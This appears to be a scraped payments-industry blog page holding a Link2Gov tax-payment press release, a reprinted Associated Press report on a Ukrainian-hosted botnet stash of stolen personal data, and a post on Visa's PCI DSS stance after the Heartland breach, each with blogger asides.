Federal balance-due tax payments initiated through Link2Gov payment services1 are authorized in real-time, with the IRS-recognized payment date being the same date the transaction is successfully completed. Taxpayers receive a transaction confirmation number as an assurance they have completed the payment process. PAY1040.com and businesstaxpayment.com accept American Express®, Discover®, MasterCard®, and Visa® credit and debit cards, as well as debit transactions from cards participating in the NYCE®, PULSE® and STAR® payments networks. New for Tax Season 2009, Link2Gov also accepts Bill Me Later payments at BML.PAY1040.com.

“The key attributes of our federal tax payment programs — speed, convenience and knowing an IRS bill has been instantly paid — become increasingly vital as the deadline closes in on taxpayers,” said Frank D’Angelo, group president, Metavante Payment Solutions, which includes Link2Gov. “Taxpayers choosing Link2Gov services receive peace of mind, and depending on their issuing bank’s card program, the opportunity to earn rewards as well.”

About Metavante

Metavante Technologies, Inc. (NYSE:MV) is the parent company of Metavante Corporation. Metavante Corporation delivers banking and payments technologies to approximately 8,000 financial services firms and businesses worldwide. Metavante products and services drive account processing for deposit, loan and trust systems, image-based and conventional check processing, electronic funds transfer, consumer healthcare payments, electronic presentment and payment, outsourcing, and payment network solutions including the NYCE Network, a leading ATM/PIN debit network. Metavante (www.metavante.com) is headquartered in Milwaukee.

1Link2Gov collects a convenience fee for PAY1040.com, businesstaxpayment.com and BML.PAY1040.com services.

Metavante, NYCE, Link2Gov and Pay1040.com are registered trademarks of Metavante Corporation, which is the principal subsidiary of Metavante Technologies, Inc.

All other trademarks are the property of their respective owners.

Related articles

• Monitise & Metavante Launch Text Message Banking (pindebit.blogspot.com)
• BINBase.com Launches Major BIN Numbers Database Update (seomashup.blogspot.com)
• E-vidence of Paradigm Shift...MasterCard Focusing on Debit Business (pindebit.blogspot.com)
• Shoppers Choice Runs Acculynk PaySecure (tm) PIN Debit Transaction (pindebit.blogspot.com)

A Pain in the Bot!

To further illustrate how dangerous it is to use a personal computer as the conduit to financial transactions, I bring you the following article from the Associated Press, which was reprinted by "CapeCodeOnline." 

And to illustrate even further...I created, well an illustration...depicting the dangers that lurk out there.  (on left)  Let's see...you've got your Zombies and Black Hats, your Snakes and Sniffers, Bots and Hackers and key-logging grifters...

What did Sanford used to tell  Lizbeth?  Oh yeah...Lizbit...here I come..."its the big one!"  Stay tuned.  It'll happen and we'll cover it right here on the PIN Payments News Blog!  Here's some stuff that ought to make you think twice before you enter your primary account number via a keyboard.   Remember, Visa might cover your butt, but you still have to deal with the hassle involved, and that could take weeks, even months.  It's a pain in the bot! 

By JORDAN ROBERTSON - THE ASSOCIATED PRESS

SAN FRANCISCO — Getting hacked is like having your computer turn traitor on you, spying on everything you do and shipping your secrets to identity thieves.  Victims don't see where their stolen data end up. But sometimes security researchers do, stumbling across stolen-data troves that offer a glimpse of what identity theft looks like from criminals' perspective.

Researchers from U.K.-based security firm Prevx found one such trove, a Web site used as a stash house for data from 160,000 infected computers before it was shut down this month.  The find offers a case study on just how much data criminals are stealing every day, from the utterly inconsequential to the alarmingly private.

It also shows the difficulty in shuttering criminals' ID-theft beachheads: The Web site Prevx found, which was operating on a server in Ukraine, was still online for nearly a month after security researchers alerted the Internet service provider and law-enforcement authorities. The site was sucking up data from 5,000 newly infected computers each day.

The victims in the Prevx find are mostly everyday people handing over their passwords for Facebook and banking sites, along with their love notes and other e-mails. But more dangerous personal information is there, too, including Social Security numbers and other account information from one bank's infected computer.

Caches of stolen data like these are hidden throughout the Internet, usually locked away inside password-protected Web sites or heavily fortified servers. Prevx's researchers were able to infiltrate this site because it was protected with poor encryption.  (Editor's Note:  Isn't that profound.  The hackers had poor encryption...)

In that sense, the find illustrates how even sloppy crooks can vacuum up enormous amounts of information through massive "botnets" — armies of infected computers formed by spreading a computer virus that orders compromised machines to phone home for further instructions, such as sending out spam or relaying passwords.

The botnet Prevx found was only harvesting data, though Prevx said it could have been upgraded to do other things.

Ordinary Internet sessions are logged in great detail. One Southern California 22-year-old could be seen registering a domain name with GoDaddy.com, changing his Yahoo e-mail password and ordering a meal online from Pizza Hut. His credit card number, birth date, telephone number, address and passwords are now all in criminals' hands, though it's unclear what, if anything, criminals have done with the information yet.

Some victims are gold mines for sensitive data.  An infected computer at a Georgia bank exposed customer details and credentials for the bank's wire-transfer system. Bank employees were checking e-mail, looking up BMWs and Infinitis and working with customers' accounts on the same infected machine.

Government computers were also hit, including one in Texas that coughed up Web site logins for one of the government's health care providers, and another in North Carolina that revealed access to an agency's human resources system.

"This is giving criminals the keys to the castle," said Prevx's director of malware research, Jacques Erasmus. "Once they're into this system, it might not seem at this point like it's the biggest data heist ever, but this is how they get into a network. This is their game — they do this every day."

In other words, criminals start small, then use their first point of attack as a way to jump onto more sensitive computers. Researchers who discover these stolen-data caches then have to figure out what to do with them. Notifying victims is time-consuming and difficult, and researchers tend to focus on trying to get service providers to deactivate the servers before criminals get to the data on them.

Prevx said it alerted the site's Internet provider, the FBI and U.K. authorities about the breach it discovered. The company also talked to the affected bank, Doraville, Ga.-based Metro City Bank, a community bank whose Web site lists four locations, and Prevx said the bank has removed the infected computer.

One customer — Yoon-Kee Hong, a 22-year-old college student from Suwanee, Ga. — had signed up for an account with Metro City Bank just a month before learning about the breach. He said he had not been alerted by the bank that his Social Security number and other personal details were stolen.

After being told about the breach by The Associated Press, which picked his name from the files provided by Prevx, the student said he planned to cancel his account.  "I cannot trust them any more," he said. "They're not doing what they're supposed to do. They didn't even notify me. It's like they're trying to hide it from their customers."

He later relented and decided to stay with the bank after he was offered a new account and promises of fraud alerts.  The bank said in a statement that it is notifying customers and is investigating the breach, refusing to comment further. State officials in North Carolina and Texas didn't return calls on the breaches there. The FBI didn't return a call about the breaches.

Such finds are becoming more common as the barrier lowers for crooks to jump into the online identity-theft racket. Top-of-the-line viruses, also known as Trojans, can be had for under $1,000.  Joe Stewart, a SecureWorks Inc. botnet expert who was not involved in Prevx's research, said that last year, he helped shut down a command-and-control server for a huge botnet that had infected more than 378,000 machines and had stolen more than 460,000 usernames and passwords.

There are countless other smaller botnets, set up by less sophisticated criminals who steal as much data as they can and simply pull up stakes, and do it all over again, once their operation has been detected.  "The level of amateurness speaks to how widespread it is," Stewart said. "Literally anybody with a little bit of computer knowledge at all, if they have the criminal bent, can get access to one of these Trojans and get it out there and start stealing people's data."

Related articles

• Credit cards support terrorism (warintel.blogspot.com)
• Is Your PC Part of a Botnet? (readwriteweb.com)

House Questions Visa, Visa Questions Heartland, Heartland Has No Answers Yet

Heartland Data Breach: Visa Questions Processor's PCI Compliance

Visa Executive: "We've Never Seen Anyone Who Was Breached That Was PCI Compliant"


Despite the Heartland Payment Systems (HPY) data breach and other noted compromises, Visa staunchly supports the Payment Card Industry Data Security Standard (PCI DSS). 

This is the message from Adrian Phillips, Visa's Deputy Chief Enterprise Risk Officer, who in an exclusive interview hammers home the credit card company's support for the security standard - and suggests that, contrary to Heartland's own statements, the payment processor may not have been PCI compliant when it was breached sometime in 2008.

"We've never seen anyone who was breached that was PCI compliant," Phillips says without specifically naming - or excluding -- Heartland. "The breaches that we have seen have involved a key area of non-compliance."

Editor's Note:  Meanwhile the House is blaming V/MC...see next post and Heartlands stock (see chart below) continues it's free fall.  (well maybe not a "free" fall...it's costing shareholders some major kahunas.  And they're so UN-HPY...they're suing...

Interviewed during last week's Visa Security Summit in Washington, D.C., Phillips acknowledges Heartland and other recent breaches, but uses them as an opportunity to support the PCI standard. "Let's remember we've had some bad breaches, but if we had not had PCI DSS, it would have been much worse," Phillips says. "As of today, I am confident that PCI DSS works."

Phillips comments come one week after news that Visa had removed Heartland Payment Systems from its certified PCI-DSS Compliant Service Providers list.

Continue Reading at Bank Info Security

HPY, Heartland Payment Systems, Visa, PCI Compliant,

Related articles

• Heartland Threatening Legal Action (pindebit.blogspot.com)
• Visa Covers Butt By 'Delisting' Breached Credit Card Payment Processors [Data Breaches] (consumerist.com)
• Updated: Acculynk...Where's the PIN Offset? My Pet PVV (pindebit.blogspot.com)
• Visa Yanks Heartland/RBS Compliance Status - BTN (pindebit.blogspot.com)